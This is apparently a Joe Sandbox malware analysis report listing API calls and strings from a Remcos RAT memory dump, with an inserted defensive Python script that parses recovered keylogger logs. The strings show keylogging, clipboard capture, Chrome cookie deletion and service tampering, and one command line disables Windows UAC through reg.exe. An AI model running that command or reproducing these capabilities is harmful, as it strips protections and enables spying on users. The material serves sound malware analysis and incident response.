• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID: h]G
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
• GetLastError.KERNEL32 ref: 0040B2EE
Strings
• [Chrome Cookies found, cleared!], xrefs: 0040B314
• [Chrome Cookies not found], xrefs: 0040B308
• UserProfile, xrefs: 0040B2B4
• \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: DeleteErrorFileLast
• String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Rmc-B3IX49$BG
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
• FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$h(RA/$mscoree.dll
APIs
• __allrem.LIBCMT ref: 00439799
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
• __allrem.LIBCMT ref: 004397CC
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
• __allrem.LIBCMT ref: 00439801
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
APIs
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: __cftoe
• String ID:
APIs
• _strlen.LIBCMT ref: 10001607
• _strcat.LIBCMT ref: 1000161D
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
• lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
• lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
• lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: lstrcatlstrlen$_strcat_strlen
• String ID:
APIs
• lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
• lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
• GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: lstrlen$AttributesFilelstrcat
• String ID:
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
• CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
• CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
• CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ChangeConfigManager
• String ID:
APIs
• GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
• SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
APIs
• GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
• SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
• _free.LIBCMT ref: 00446F06
• _free.LIBCMT ref: 00446F2E
• SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
• SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
• _abort.LIBCMT ref: 00446F4D
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
APIs
• GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
• _free.LIBCMT ref: 10005B2D
• _free.LIBCMT ref: 10005B55
• SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
• SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
• _abort.LIBCMT ref: 10005B74
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
• ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
APIs
• RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
• RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Enum$InfoQueryValue
• String ID: [regsplt]$DG
• API String ID: 3554306468-1089238109
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free
• String ID: wKE
• API String ID: 269201875-3150218262
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
• __freea.LIBCMT ref: 100087D5
  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID: h(RA/
• API String ID: 2652629310-661517699
                                                                                                                  • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                  • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                  • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                                  • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
APIs
  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
• GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: lstrlen$_strlenlstrcat$AttributesFile
• String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
• API String ID: 4036392271-1520055953
• Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
• Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
• Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
• Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
APIs
  • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
  • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
  • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
• __Init_thread_footer.LIBCMT ref: 0040AEA7
  • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
  • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
• String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
• API String ID: 2974294136-4018440003
• Opcode ID: 0222f0a90c87f2efd47c2472c97df4ab9b7d2352ff73c3fdd24ed2fb6d009c4e
• Instruction ID: f936e1d100a0b91fb3cd099947d4fcefdabc4258effb679c9043d151633dcd27
• Opcode Fuzzy Hash: 0222f0a90c87f2efd47c2472c97df4ab9b7d2352ff73c3fdd24ed2fb6d009c4e
• Instruction Fuzzy Hash: EF21B131A002158ACB14FB75D8969EE7374AF54318F50403FF902771E2EF386E5A8A8D
APIs
• GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
• wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: EventLocalTimewsprintf
• String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
• API String ID: 1497725170-248792730
• Opcode ID: 9a34a7458f1c20cb12493feb96893f1eba9bb7caed0c70e4ea315b3b83d61c09
• Instruction ID: fc972a95d23854bc9b4bbea89c8e615d9b1bb69bfa4db415bad433d1ad0b57c3
• Opcode Fuzzy Hash: 9a34a7458f1c20cb12493feb96893f1eba9bb7caed0c70e4ea315b3b83d61c09
• Instruction Fuzzy Hash: 5A118172400118AACB18FB56EC55CFE77B8AE48325F00013FF842620D1EF7C5A86C6E8
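The function above stamps each Remcos offline-keylogger session with GetLocalTime through the wsprintfW format `[%04i/%02i/%02i %02i:%02i:%02i ` and the strings `Offline Keylogger Started` and `]`; the clipboard markers `[Text copied to clipboard]` and `[End of clipboard]` belong to the function listed two entries earlier. The Python below is an added triage example, not part of the Joe Sandbox report and not Remcos code. It assumes the three header pieces are concatenated in that order into one line per session (the report shows the pieces, not the final layout), and it parses a constructed sample log into a per-session timeline of typed lines and clipboard captures, which is what an analyst wants from a recovered log file.

```python
import re
from dataclasses import dataclass, field
from datetime import datetime
from typing import List

# Session header as assumed from the report's strings: wsprintfW format
# "[%04i/%02i/%02i %02i:%02i:%02i " + "Offline Keylogger Started" + "]".
# The concatenation order is an assumption, not something the report states.
SESSION_RE = re.compile(
    r"^\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) Offline Keylogger Started\]$"
)
CLIP_START = "[Text copied to clipboard]"   # string from the clipboard function
CLIP_END = "[End of clipboard]"             # string from the clipboard function

# Constructed sample log (not a real capture); the free-text lines are made up.
SAMPLE_LOG = (
    "[2024/12/13 10:22:15 Offline Keylogger Started]\r\n"
    "hello team, the invoice is attached\r\n"
    "[Text copied to clipboard]\r\n"
    "P@ssw0rd-example\r\n"
    "[End of clipboard]\r\n"
    "[2024/12/13 11:05:02 Offline Keylogger Started]\r\n"
    "typed more text\r\n"
)


@dataclass
class Session:
    started: datetime
    keystrokes: List[str] = field(default_factory=list)   # typed lines
    clipboard: List[str] = field(default_factory=list)    # clipboard captures


def parse_remcos_keylog(text: str) -> List[Session]:
    """Split a log into sessions; each session keeps typed lines and clipboard grabs."""
    sessions: List[Session] = []
    current = None
    in_clip = False
    clip_buf: List[str] = []
    for line in text.splitlines():
        m = SESSION_RE.match(line)
        if m:
            y, mo, d, h, mi, s = (int(g) for g in m.groups())
            current = Session(started=datetime(y, mo, d, h, mi, s))
            sessions.append(current)
            in_clip, clip_buf = False, []
            continue
        if current is None:
            continue                      # data before the first header is skipped
        if line == CLIP_START:
            in_clip, clip_buf = True, []
        elif line == CLIP_END and in_clip:
            current.clipboard.append("\n".join(clip_buf))
            in_clip = False
        elif in_clip:
            clip_buf.append(line)
        elif line:
            current.keystrokes.append(line)
    return sessions


def looks_like_remcos_keylog(text: str) -> bool:
    """Cheap triage check: at least one session header in the expected format."""
    return any(SESSION_RE.match(line) for line in text.splitlines())


def timeline(sessions: List[Session]) -> List[str]:
    """One summary line per session, suitable for an incident timeline."""
    return [
        f"{s.started:%Y-%m-%d %H:%M:%S} keylog session: "
        f"{len(s.keystrokes)} typed line(s), {len(s.clipboard)} clipboard capture(s)"
        for s in sessions
    ]


if __name__ == "__main__":
    for entry in timeline(parse_remcos_keylog(SAMPLE_LOG)):
        print(entry)
```

The header regex is anchored on the exact spelling recovered from the dump; if a sample builds the line differently, adjust SESSION_RE rather than loosening the clipboard markers, which are also useful as literal hunting strings on disk. Timestamps come from GetLocalTime, so they are in the victim's local zone, not UTC.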
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
• Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
• CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleSizeSleep
• String ID: `AG
• API String ID: 1958988193-3058481221
• Opcode ID: c7a1c7132ab23e5055f4e72d382b13d917683b1be07da7315746d2f78610f71c
• Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
• Opcode Fuzzy Hash: c7a1c7132ab23e5055f4e72d382b13d917683b1be07da7315746d2f78610f71c
• Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
APIs
• RegisterClassExA.USER32(00000030), ref: 0041CA7C
• CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
• GetLastError.KERNEL32 ref: 0041CAA1
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ClassCreateErrorLastRegisterWindow
• String ID: 0$MsgWindowClass
• API String ID: 2877667751-2410386613
• Opcode ID: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
• Instruction ID: 4bfad48e3247df46523b3088673b608286a28c5fe91561ad906263ccd1e0ab35
• Opcode Fuzzy Hash: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
• Instruction Fuzzy Hash: 7001E5B1D1421DAB8B01DFEADCC49EFBBBDBE49295B50452AE415B2200E7708A458BA4
APIs
• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
• CloseHandle.KERNEL32(?), ref: 00406A0F
• CloseHandle.KERNEL32(?), ref: 00406A14
Strings
• /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
• C:\Windows\System32\cmd.exe, xrefs: 004069FB
Memory Dump Source
